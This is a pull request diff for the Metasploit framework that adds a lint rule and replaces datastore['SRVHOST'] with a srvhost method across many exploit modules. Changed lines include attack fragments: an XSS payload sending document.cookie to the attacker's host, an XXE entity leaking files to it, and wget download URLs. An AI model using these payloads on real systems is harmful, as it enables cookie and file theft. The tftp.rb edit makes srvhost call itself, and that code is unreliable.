### PR TITLE
Update modules to use srvhost method

### DIFF
--- a/.rubocop.yml
+++ b/.rubocop.yml
@@ -25,6 +25,7 @@ require:
   - ./lib/rubocop/cop/lint/detect_invalid_pack_directives.rb
   - ./lib/rubocop/cop/lint/detect_metadata_trailing_leading_whitespace.rb
   - ./lib/rubocop/cop/lint/detect_outdated_cmd_exec_api.rb
+  - ./lib/rubocop/cop/lint/datastore_srvhost_usage.rb
 
 Layout/SpaceBeforeBrackets:
   Enabled: true

--- a/lib/msf/core/exploit/format/webarchive.rb
+++ b/lib/msf/core/exploit/format/webarchive.rb
@@ -329,7 +329,7 @@ function reportStolenCookies() {
   # @return [String] formatted http/https URL of the listener
   def backend_url
     proto = (datastore["SSL"] ? "https" : "http")
-    myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
     port_str = (datastore['HTTPPORT'].to_i == 80) ? '' : ":#{datastore['HTTPPORT']}"
     "#{proto}://#{myhost}#{port_str}"
   end

--- a/lib/msf/core/exploit/remote/browser_autopwn2.rb
+++ b/lib/msf/core/exploit/remote/browser_autopwn2.rb
@@ -128,7 +128,7 @@ module Msf
       p = select_payload(xploit)
       xploit.datastore['PAYLOAD']     = p.first[:payload_name]
       xploit.datastore['LPORT']       = p.first[:payload_lport]
-      xploit.datastore['SRVHOST']     = datastore['SRVHOST']
+      xploit.datastore['SRVHOST']     = srvhost
       xploit.datastore['SRVPORT']     = datastore['SRVPORT']
       xploit.datastore['LHOST']       = get_payload_lhost
 
@@ -553,12 +553,13 @@ module Msf
       show_ready_exploits
       proto = (datastore['SSL'] ? "https" : "http")
 
+      service_srvhost = nil
       if datastore['URIHOST'] && datastore['URIHOST'] != '0.0.0.0'
-        srvhost = datastore['URIHOST']
-      elsif datastore['SRVHOST'] && datastore['SRVHOST'] != '0.0.0.0'
-        srvhost = datastore['SRVHOST']
+        service_srvhost = datastore['URIHOST']
+      elsif srvhost && srvhost != '0.0.0.0'
+        service_srvhost = srvhost
       else
-        srvhost = Rex::Socket.source_address
+        service_srvhost = Rex::Socket.source_address
       end
 
       if datastore['URIPORT'] && datastore['URIPORT'] != 0
@@ -567,7 +568,7 @@ module Msf
         srvport = datastore['SRVPORT']
       end
 
-      service_uri = "#{proto}://#{srvhost}:#{srvport}#{get_resource}"
+      service_uri = "#{proto}://#{service_srvhost}:#{srvport}#{get_resource}"
       print_good("Please use the following URL for the browser attack:")
       print_good("BrowserAutoPwn URL: #{service_uri}")
     end
@@ -663,8 +664,8 @@ module Msf
         host = ''
         if datastore['URIHOST'] && datastore['URIHOST'] != '0.0.0.0'
           host = datastore['URIHOST']
-        elsif datastore['SRVHOST'] && datastore['SRVHOST'] != '0.0.0.0'
-          host = datastore['SRVHOST']
+        elsif srvhost && srvhost != '0.0.0.0'
+          host = srvhost
         else
           host = Rex::Socket.source_address
         end

--- a/lib/msf/core/exploit/remote/http_server.rb
+++ b/lib/msf/core/exploit/remote/http_server.rb
@@ -489,7 +489,7 @@ module Exploit::Remote::HttpServer
     elsif (datastore['LHOST'] and (!datastore['LHOST'].strip.empty?))
       host = datastore["LHOST"]
     else
-      if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
+      if (srvhost == "0.0.0.0" or srvhost == "::")
         if (respond_to?(:sock) and sock and sock.peerhost)
           # Then this is a Passive-Aggressive module. It has a socket
           # connected to the remote server from which we can deduce the
@@ -504,7 +504,7 @@ module Exploit::Remote::HttpServer
           host = Rex::Socket.source_address
         end
       else
-        host = datastore['SRVHOST']
+        host = srvhost
       end
     end
 

--- a/lib/msf/core/exploit/remote/jndi_injection.rb
+++ b/lib/msf/core/exploit/remote/jndi_injection.rb
@@ -35,7 +35,7 @@ module Exploit::Remote::JndiInjection
   # @return [String] the JNDI string
   def jndi_string(resource = nil)
     resource ||= "dc=#{Rex::Text.rand_text_alpha_lower(6)},dc=#{Rex::Text.rand_text_alpha_lower(3)}"
-    "ldap://#{Rex::Socket.to_authority(datastore['SRVHOST'], datastore['SRVPORT'])}/#{resource}"
+    "ldap://#{Rex::Socket.to_authority(srvhost, datastore['SRVPORT'])}/#{resource}"
   end
 
   ## LDAP service callbacks

--- a/lib/msf/core/exploit/remote/smb/relay_server.rb
+++ b/lib/msf/core/exploit/remote/smb/relay_server.rb
@@ -117,14 +117,14 @@ module Msf
 
         validate_smb_hash_capture_datastore(datastore, ntlm_provider)
 
-        comm = _determine_server_comm(datastore['SRVHOST'])
-        print_status("SMB Server is running. Listening on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}")
+        comm = _determine_server_comm(srvhost)
+        print_status("SMB Server is running. Listening on #{srvhost}:#{datastore['SRVPORT']}")
         @service = Rex::ServiceManager.start(
           self.class::SMBRelayServer,
           {
             socket: {
               'Comm' => comm,
-              'LocalHost' => datastore['SRVHOST'],
+              'LocalHost' => srvhost,
               'LocalPort' => datastore['SRVPORT'],
               'Server' => true,
               'Timeout' => datastore['SRV_TIMEOUT'],

--- a/lib/msf/core/exploit/remote/socket_server.rb
+++ b/lib/msf/core/exploit/remote/socket_server.rb
@@ -110,7 +110,7 @@ module Exploit::Remote::SocketServer
   # Returns the local host that is being listened on.
   #
   def srvhost
-    datastore['SRVHOST']
+    datastore['SRVHOST'] # rubocop:disable Lint/DatastoreSrvhostUsage
   end
 
   #
@@ -125,7 +125,7 @@ module Exploit::Remote::SocketServer
   # specified and can be used for binding to a specific address when NATing is in place.
   #
   def bindhost
-    datastore['ListenerBindAddress'].blank? ? datastore['SRVHOST'] : datastore['ListenerBindAddress']
+    datastore['ListenerBindAddress'].blank? ? srvhost : datastore['ListenerBindAddress']
   end
 
   def bindport

--- a/lib/rubocop/cop/lint/datastore_srvhost_usage.rb
+++ b/lib/rubocop/cop/lint/datastore_srvhost_usage.rb
@@ -1,0 +1,42 @@
+# frozen_string_literal: true
+
+module RuboCop
+  module Cop
+    module Lint
+      # Detects direct access to datastore['SRVHOST'] and recommends using the srvhost method instead.
+      #
+      # The srvhost method provides a cleaner API for accessing the SRVHOST value from the datastore.
+      #
+      # @example
+      #   # bad
+      #   datastore['SRVHOST']
+      #   datastore["SRVHOST"]
+      #
+      #   # good
+      #   srvhost
+      class DatastoreSrvhostUsage < Base
+        extend AutoCorrector
+
+        MSG = 'Use the `srvhost` method instead of directly accessing `datastore[\'SRVHOST\']`.'
+
+        # @!method datastore_srvhost_access?(node)
+        def_node_matcher :datastore_srvhost_access?, <<~PATTERN
+          (send
+            (send nil? :datastore) :[]
+            (str {"SRVHOST"}))
+        PATTERN
+
+        # Called for every method call in the code
+        # Checks if it's a datastore['SRVHOST'] access and registers an offense if so
+        # @param node [RuboCop::AST::SendNode] The method call node being checked
+        def on_send(node)
+          return unless datastore_srvhost_access?(node)
+
+          add_offense(node, message: MSG) do |corrector|
+            corrector.replace(node, 'srvhost')
+          end
+        end
+      end
+    end
+  end
+end

--- a/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb
+++ b/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb
@@ -177,7 +177,7 @@ class MetasploitModule < Msf::Auxiliary
 
   def backend_url
     proto = (datastore['SSL'] ? 'https' : 'http')
-    myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
     port_str = (datastore['SRVPORT'].to_i == 80) ? '' : ":#{datastore['SRVPORT']}"
     "#{proto}://#{myhost}#{port_str}/#{datastore['URIPATH']}/catch"
   end

--- a/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.rb
+++ b/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.rb
@@ -68,7 +68,7 @@ class MetasploitModule < Msf::Auxiliary
   def setup_xml_and_variables
     @host = datastore['RHOSTS']
     @port = datastore['RPORT']
-    @srv_host = datastore['SRVHOST']
+    @srv_host = srvhost
     @srv_port = datastore['SRVPORT']
     @path = datastore['TARGETURI']
 

--- a/modules/auxiliary/fileformat/specialfolder_leak.rb
+++ b/modules/auxiliary/fileformat/specialfolder_leak.rb
@@ -156,12 +156,12 @@ class MetasploitModule < Msf::Auxiliary
     start_service
     unc_share = datastore['SHARE']
     unc_share = Rex::Text.rand_text_alphanumeric(6) if unc_share.blank?
-    unc_path = "\\\\#{datastore['SRVHOST']}\\#{unc_share}"
+    unc_path = "\\\\#{srvhost}\\#{unc_share}"
 
     lnk_data = ms_shllink(unc_path, app_name)
     file_create(lnk_data)
     print_good("LNK file created: #{datastore['FILENAME']}")
-    print_status("Listening for hashes on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}")
+    print_status("Listening for hashes on #{srvhost}:#{datastore['SRVPORT']}")
     stime = Time.now.to_f
     timeout = datastore['ListenerTimeout'].to_i
     loop do

--- a/modules/auxiliary/gather/android_stock_browser_uxss.rb
+++ b/modules/auxiliary/gather/android_stock_browser_uxss.rb
@@ -220,7 +220,7 @@ class MetasploitModule < Msf::Auxiliary
 
   def backend_url
     proto = (datastore["SSL"] ? "https" : "http")
-    myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
     port_str = (datastore['SRVPORT'].to_i == 80) ? '' : ":#{datastore['SRVPORT']}"
     "#{proto}://#{myhost}#{port_str}/#{datastore['URIPATH']}/catch"
   end

--- a/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb
+++ b/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb
@@ -77,7 +77,7 @@ class MetasploitModule < Msf::Auxiliary
 
     # Default the server host / port
     opts = {
-      'ServerHost' => datastore['SRVHOST'],
+      'ServerHost' => srvhost,
       'ServerPort' => datastore['HTTPPORT'],
       'Comm' => comm
     }.update(opts)
@@ -124,10 +124,10 @@ class MetasploitModule < Msf::Auxiliary
   #
   def lookup_lhost(c = nil)
     # Get the source address
-    if datastore['SRVHOST'] == '0.0.0.0'
+    if srvhost == '0.0.0.0'
       Rex::Socket.source_address(c || '50.50.50.50')
     else
-      datastore['SRVHOST']
+      srvhost
     end
   end
 

--- a/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb
+++ b/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb
@@ -89,7 +89,7 @@ class MetasploitModule < Msf::Auxiliary
   # @return [String] formatted http/https URL of the listener
   def backend_url
     proto = (datastore["SSL"] ? "https" : "http")
-    myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
     port_str = (datastore['SRVPORT'].to_i == 80) ? '' : ":#{datastore['SRVPORT']}"
     "#{proto}://#{myhost}#{port_str}/#{datastore['URIPATH']}/catch"
   end

--- a/modules/auxiliary/gather/firefox_pdfjs_file_theft.rb
+++ b/modules/auxiliary/gather/firefox_pdfjs_file_theft.rb
@@ -93,7 +93,7 @@ class MetasploitModule < Msf::Auxiliary
 
   def backend_url
     proto = (datastore['SSL'] ? 'https' : 'http')
-    my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+    my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
     port_str = (datastore['SRVPORT'].to_i == 80) ? '' : ":#{datastore['SRVPORT']}"
     resource = ('/' == get_resource[-1, 1]) ? get_resource[0, get_resource.length - 1] : get_resource
 

--- a/modules/auxiliary/gather/ie_sandbox_findfiles.rb
+++ b/modules/auxiliary/gather/ie_sandbox_findfiles.rb
@@ -51,7 +51,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def js
-    my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
 
     %Q|function report() {
   if(window.location.protocol != 'file:') {
@@ -98,7 +98,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def svg
-    my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
 
     %Q|<!-- saved from url=(0014)about:internet -->
 <svg width="100px" height="100px" version="1.1" onload="try{ location.href = 'file://#{my_host}/#{datastore['SHARENAME']}/index.html'; } catch(e) { }" xmlns="http://www.w3.org/2000/svg"></svg>|
@@ -118,7 +118,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def on_request_uri(cli, request)
-    my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
 
     case request.method
     when 'OPTIONS'
@@ -206,7 +206,7 @@ class MetasploitModule < Msf::Auxiliary
     print_status("PROPFIND #{path}")
     body = ''
 
-    my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     my_uri = "http://#{my_host}/"
 
     if path !~ /\/$/

--- a/modules/auxiliary/gather/magento_xxe_cve_2024_34102.rb
+++ b/modules/auxiliary/gather/magento_xxe_cve_2024_34102.rb
@@ -95,7 +95,7 @@ class MetasploitModule < Msf::Auxiliary
     ent_file = Rex::Text.rand_text_alpha_lower(4..8)
     %(
       <!ENTITY % #{ent_file} SYSTEM "#{filter_path}">
-      <!ENTITY % #{dtd_param_name} "<!ENTITY #{ent_eval} SYSTEM 'http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/?#{leak_param_name}=%#{ent_file};'>">
+      <!ENTITY % #{dtd_param_name} "<!ENTITY #{ent_eval} SYSTEM 'http://#{srvhost}:#{datastore['SRVPORT']}/?#{leak_param_name}=%#{ent_file};'>">
     )
   end
 
@@ -106,7 +106,7 @@ class MetasploitModule < Msf::Auxiliary
     xml += "<!DOCTYPE #{Rex::Text.rand_text_alpha_lower(4..8)}"
     xml += '['
     xml += "  <!ELEMENT #{Rex::Text.rand_text_alpha_lower(4..8)} ANY >"
-    xml += "    <!ENTITY % #{param_entity_name} SYSTEM 'http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha_lower(4..8)}.dtd'> %#{param_entity_name}; %#{dtd_param_name}; "
+    xml += "    <!ENTITY % #{param_entity_name} SYSTEM 'http://#{srvhost}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha_lower(4..8)}.dtd'> %#{param_entity_name}; %#{dtd_param_name}; "
     xml += ']'
     xml += "> <r>&#{ent_eval};</r>"
 

--- a/modules/auxiliary/gather/safari_file_url_navigation.rb
+++ b/modules/auxiliary/gather/safari_file_url_navigation.rb
@@ -48,10 +48,10 @@ class MetasploitModule < Msf::Auxiliary
 
   def lookup_lhost(c = nil)
     # Get the source address
-    if datastore['SRVHOST'] == '0.0.0.0'
+    if srvhost == '0.0.0.0'
       Rex::Socket.source_address(c || '50.50.50.50')
     else
-      datastore['SRVHOST']
+      srvhost
     end
   end
 
@@ -231,7 +231,7 @@ class MetasploitModule < Msf::Auxiliary
 
     # Default the server host / port
     opts = {
-      'ServerHost' => datastore['SRVHOST'],
+      'ServerHost' => srvhost,
       'ServerPort' => datastore['HTTPPORT'],
       'Comm' => comm
     }.update(opts)

--- a/modules/auxiliary/server/android_mercury_parseuri.rb
+++ b/modules/auxiliary/server/android_mercury_parseuri.rb
@@ -72,7 +72,7 @@ class MetasploitModule < Msf::Auxiliary
 
   def backend_url
     proto = (datastore['SSL'] ? 'https' : 'http')
-    my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+    my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
     port_str = (datastore['SRVPORT'].to_i == 80) ? '' : ":#{datastore['SRVPORT']}"
     resource = ('/' == get_resource[-1, 1]) ? get_resource[0, get_resource.length - 1] : get_resource
 

--- a/modules/auxiliary/server/browser_autopwn.rb
+++ b/modules/auxiliary/server/browser_autopwn.rb
@@ -365,7 +365,7 @@ class MetasploitModule < Msf::Auxiliary
     @payloads[lport] = payload
 
     print_status("Starting exploit #{name} with payload #{payload}")
-    @exploits[name].datastore['SRVHOST'] = datastore['SRVHOST']
+    @exploits[name].datastore['SRVHOST'] = srvhost
     @exploits[name].datastore['SRVPORT'] = datastore['SRVPORT']
 
     # For testing, set the exploit uri to the name of the exploit so it's

--- a/modules/auxiliary/server/capture/http.rb
+++ b/modules/auxiliary/server/capture/http.rb
@@ -62,7 +62,7 @@ class MetasploitModule < Msf::Auxiliary
     @formsdir = datastore['FORMSDIR']
     @template = datastore['TEMPLATE']
     @sitelist = datastore['SITELIST']
-    @myhost = datastore['SRVHOST']
+    @myhost = srvhost
     @myport = datastore['SRVPORT']
 
     @myautopwn_host = datastore['AUTOPWN_HOST']

--- a/modules/auxiliary/server/capture/http_basic.rb
+++ b/modules/auxiliary/server/capture/http_basic.rb
@@ -54,7 +54,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run
-    @myhost = datastore['SRVHOST']
+    @myhost = srvhost
     @myport = datastore['SRVPORT']
     @realm = datastore['REALM']
 

--- a/modules/auxiliary/server/capture/pop3.rb
+++ b/modules/auxiliary/server/capture/pop3.rb
@@ -43,7 +43,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run
-    @myhost = datastore['SRVHOST']
+    @myhost = srvhost
     @myport = datastore['SRVPORT']
     exploit
   end

--- a/modules/auxiliary/server/capture/printjob_capture.rb
+++ b/modules/auxiliary/server/capture/printjob_capture.rb
@@ -55,7 +55,7 @@ class MetasploitModule < Msf::Auxiliary
     @state = {}
 
     begin
-      @srvhost = datastore['SRVHOST']
+      @srvhost = srvhost
       @srvport = datastore['SRVPORT'] || 9100
       @mode = datastore['MODE'].upcase || 'RAW'
       if datastore['FORWARD']

--- a/modules/auxiliary/server/capture/sip.rb
+++ b/modules/auxiliary/server/capture/sip.rb
@@ -139,12 +139,12 @@ class MetasploitModule < Msf::Auxiliary
   def run
     @port = datastore['SRVPORT'].to_i
     @sock = Rex::Socket::Udp.create(
-      'LocalHost' => datastore['SRVHOST'],
+      'LocalHost' => srvhost,
       'LocalPort' => @port,
       'Context' => { 'Msf' => framework, 'MsfExploit' => self }
     )
     @run = true
-    server_ip = sip_sanitize_address(datastore['SRVHOST'])
+    server_ip = sip_sanitize_address(srvhost)
 
     while @run
       res = @sock.recvfrom

--- a/modules/auxiliary/server/capture/smtp.rb
+++ b/modules/auxiliary/server/capture/smtp.rb
@@ -241,7 +241,7 @@ class MetasploitModule < Msf::Auxiliary
         return
       elsif arg == 'CRAM-MD5'
         # create and send challenge
-        challenge = "<#{Rex::Text.rand_text_numeric(9..12)}@#{datastore['SRVHOST']}>"
+        challenge = "<#{Rex::Text.rand_text_numeric(9..12)}@#{srvhost}>"
         client.put "334 #{Rex::Text.encode_base64(challenge)}\r\n"
         @state[client][:auth_cram] = true
         @state[client][:auth_cram_challenge] = challenge

--- a/modules/auxiliary/server/dns/spoofhelper.rb
+++ b/modules/auxiliary/server/dns/spoofhelper.rb
@@ -54,7 +54,7 @@ class MetasploitModule < Msf::Auxiliary
 
     @sock = ::UDPSocket.new
     @sock.setsockopt(::Socket::SOL_SOCKET, ::Socket::SO_REUSEADDR, 1)
-    @sock.bind(datastore['SRVHOST'], @port)
+    @sock.bind(srvhost, @port)
     @run = true
 
     while @run

--- a/modules/auxiliary/server/fakedns.rb
+++ b/modules/auxiliary/server/fakedns.rb
@@ -78,7 +78,7 @@ class MetasploitModule < Msf::Auxiliary
     print_status("DNS server initializing")
     @sock = ::UDPSocket.new()
     @sock.setsockopt(::Socket::SOL_SOCKET, ::Socket::SO_REUSEADDR, 1)
-    @sock.bind(datastore['SRVHOST'], @port)
+    @sock.bind(srvhost, @port)
     @run = true
     @domain_target_list = datastore['TARGETDOMAIN'].split
     @bypass = (datastore['TARGETACTION'].upcase == "BYPASS")

--- a/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb
+++ b/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb
@@ -100,7 +100,7 @@ class MetasploitModule < Msf::Auxiliary
     fake_host = datastore['FAKEHOST'] || datastore['HOST']
     fake_port = datastore['FAKEPORT'] || datastore['PORT']
     host = datastore['HOST']
-    local_host = datastore['SRVHOST']
+    local_host = srvhost
     local_port = datastore['SRVPORT']
     port = datastore['PORT']
 

--- a/modules/auxiliary/server/netbios_spoof_nat.rb
+++ b/modules/auxiliary/server/netbios_spoof_nat.rb
@@ -69,7 +69,7 @@ class MetasploitModule < Msf::Auxiliary
 
     @sock = ::UDPSocket.new()
     @sock.setsockopt(::Socket::SOL_SOCKET, ::Socket::SO_REUSEADDR, 1)
-    @sock.bind(datastore['SRVHOST'], @port)
+    @sock.bind(srvhost, @port)
 
     @targ_rate = datastore['PPSRATE']
     @fake_name = datastore['NBNAME']

--- a/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb
+++ b/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb
@@ -80,7 +80,7 @@ class MetasploitModule < Msf::Auxiliary
   def run
     host = datastore['HOST']
     port = datastore['PORT']
-    local_host = datastore['SRVHOST']
+    local_host = srvhost
     local_port = datastore['SRVPORT']
 
     root_ca_name = OpenSSL::X509::Name.parse('/C=US/O=Root Inc./CN=Root CA')

--- a/modules/auxiliary/server/openssl_heartbeat_client_memory.rb
+++ b/modules/auxiliary/server/openssl_heartbeat_client_memory.rb
@@ -58,7 +58,7 @@ class MetasploitModule < Msf::Auxiliary
 
   # Setup the server module and start handling requests
   def run
-    print_status("Listening on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}...")
+    print_status("Listening on #{srvhost}:#{datastore['SRVPORT']}...")
     exploit
   end
 

--- a/modules/auxiliary/server/tftp.rb
+++ b/modules/auxiliary/server/tftp.rb
@@ -37,7 +37,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def srvhost
-    datastore['SRVHOST'] || '0.0.0.0'
+    srvhost || '0.0.0.0'
   end
 
   def srvport

--- a/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb
+++ b/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb
@@ -123,9 +123,9 @@ class MetasploitModule < Msf::Exploit::Remote
       <ns7744:login xmlns:ns7744="urn:NSConfig">
       <username xsi:type="xsd:string">nsroot</username>
       <password xsi:type="xsd:string">nsroot</password>
-      <clientip xsi:type="xsd:string">#{datastore['SRVHOST']}</clientip>
+      <clientip xsi:type="xsd:string">#{srvhost}</clientip>
       <cookieTimeout xsi:type="xsd:int">1800</cookieTimeout>
-      <ns xsi:type="xsd:string">#{datastore['SRVHOST']}</ns>
+      <ns xsi:type="xsd:string">#{srvhost}</ns>
       </ns7744:login>
       </SOAP-ENV:Body>
       </SOAP-ENV:Envelope>

--- a/modules/exploits/linux/http/chaos_rat_xss_to_rce.rb
+++ b/modules/exploits/linux/http/chaos_rat_xss_to_rce.rb
@@ -212,7 +212,7 @@ class MetasploitModule < Msf::Exploit::Remote
       data = {
         'client_id' => mac_address,
         # removed the rickroll from the PoC :(
-        'response' => convert_to_int_array("</pre><script>var i = new Image;i.src='http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/'+document.cookie;</script>"),
+        'response' => convert_to_int_array("</pre><script>var i = new Image;i.src='http://#{srvhost}:#{datastore['SRVPORT']}/'+document.cookie;</script>"),
         'has_error' => false
       }
       wsock.put_wsbinary(JSON.generate(data))
@@ -239,7 +239,7 @@ class MetasploitModule < Msf::Exploit::Remote
         os_name: datastore['AGENT_OS'],
         os_arch: 'amd64',
         mac_address: mac_address,
-        local_ip_address: datastore['SRVHOST'],
+        local_ip_address: srvhost,
         port: datastore['SRVPORT'].to_s,
         fetched_unix: Time.now.to_i
       }

--- a/modules/exploits/linux/http/craftcms_ftp_template.rb
+++ b/modules/exploits/linux/http/craftcms_ftp_template.rb
@@ -189,7 +189,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def trigger_http_request
     vprint_status('Triggering HTTP request...')
-    templates_path = "ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}"
+    templates_path = "ftp://#{srvhost}:#{datastore['SRVPORT']}"
     send_request_raw(
       'uri' => normalize_uri(target_uri.path) + "?--templatesPath=#{templates_path}",
       'method' => 'GET'
@@ -212,7 +212,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     vprint_status('Starting FTP service...')
     start_ftp_service
-    vprint_status("FTP server started on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}")
+    vprint_status("FTP server started on #{srvhost}:#{datastore['SRVPORT']}")
     vprint_status('Sending HTTP request to trigger the payload...')
     trigger_http_request
   end

--- a/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb
+++ b/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb
@@ -128,10 +128,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
       # we use SRVHOST as download IP for the coming wget command.
       # SRVHOST needs a real IP address of our download host
-      if (datastore['SRVHOST'] == '0.0.0.0' or datastore['SRVHOST'] == '::')
+      if (srvhost == '0.0.0.0' or srvhost == '::')
         srv_host = Rex::Socket.source_address(rhost)
       else
-        srv_host = datastore['SRVHOST']
+        srv_host = srvhost
       end
 
       service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri

--- a/modules/exploits/linux/http/dlink_dir615_up_exec.rb
+++ b/modules/exploits/linux/http/dlink_dir615_up_exec.rb
@@ -160,10 +160,10 @@ class MetasploitModule < Msf::Exploit::Remote
       service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
     else
 
-      if (datastore['SRVHOST'] == '0.0.0.0' or datastore['SRVHOST'] == '::')
+      if (srvhost == '0.0.0.0' or srvhost == '::')
         srv_host = Rex::Socket.source_address(rhost)
       else
-        srv_host = datastore['SRVHOST']
+        srv_host = srvhost
       end
 
       service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri

--- a/modules/exploits/linux/http/dlink_hnap_login_bof.rb
+++ b/modules/exploits/linux/http/dlink_hnap_login_bof.rb
@@ -262,10 +262,10 @@ class MetasploitModule < Msf::Exploit::Remote
       @elf_sent = false
       resource_uri = '/' + downfile
 
-      if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
+      if (srvhost == "0.0.0.0" or srvhost == "::")
         srv_host = Rex::Socket.source_address(rhost)
       else
-        srv_host = datastore['SRVHOST']
+        srv_host = srvhost
       end
 
       service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri

--- a/modules/exploits/linux/http/huawei_hg532n_cmdinject.rb
+++ b/modules/exploits/linux/http/huawei_hg532n_cmdinject.rb
@@ -471,10 +471,10 @@ class MetasploitModule < Msf::Exploit::Remote
     srv_host =
       if datastore['DOWNHOST']
         datastore['DOWNHOST']
-      elsif datastore['SRVHOST'] == '0.0.0.0' || datastore['SRVHOST'] == '::'
+      elsif srvhost == '0.0.0.0' || srvhost == '::'
         Rex::Socket.source_address(rhost)
       else
-        datastore['SRVHOST']
+        srvhost
       end
 
     srv_port = datastore['SRVPORT'].to_s

--- a/modules/exploits/linux/http/ibm_qradar_unauth_rce.rb
+++ b/modules/exploits/linux/http/ibm_qradar_unauth_rce.rb
@@ -146,10 +146,10 @@ class MetasploitModule < Msf::Exploit::Remote
     @payload_name = rand_text_alpha_lower(3..5)
     root_payload = rand_text_alpha_lower(3..5)
 
-    if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
+    if (srvhost == "0.0.0.0" or srvhost == "::")
       srv_host = Rex::Socket.source_address(rhost)
     else
-      srv_host = datastore['SRVHOST']
+      srv_host = srvhost
     end
 
     http_service = (datastore['SSL'] ? 'https://' : 'http://') + srv_host + ':' + datastore['SRVPORT'].to_s

--- a/modules/exploits/linux/http/linksys_e1500_apply_exec.rb
+++ b/modules/exploits/linux/http/linksys_e1500_apply_exec.rb
@@ -158,10 +158,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
       # we use SRVHOST as download IP for the coming wget command.
       # SRVHOST needs a real IP address of our download host
-      if (datastore['SRVHOST'] == '0.0.0.0' or datastore['SRVHOST'] == '::')
+      if (srvhost == '0.0.0.0' or srvhost == '::')
         srv_host = Rex::Socket.source_address(rhost)
       else
-        srv_host = datastore['SRVHOST']
+        srv_host = srvhost
       end
 
       service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri

--- a/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb
+++ b/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb
@@ -309,10 +309,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
       # we use SRVHOST as download IP for the coming wget command.
       # SRVHOST needs a real IP address of our download host
-      if (datastore['SRVHOST'] == '0.0.0.0' or datastore['SRVHOST'] == '::')
+      if (srvhost == '0.0.0.0' or srvhost == '::')
         srv_host = Rex::Socket.source_address(rhost)
       else
-        srv_host = datastore['SRVHOST']
+        srv_host = srvhost
       end
 
       service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri

--- a/modules/exploits/linux/http/magento_xxe_to_glibc_buf_overflow.rb
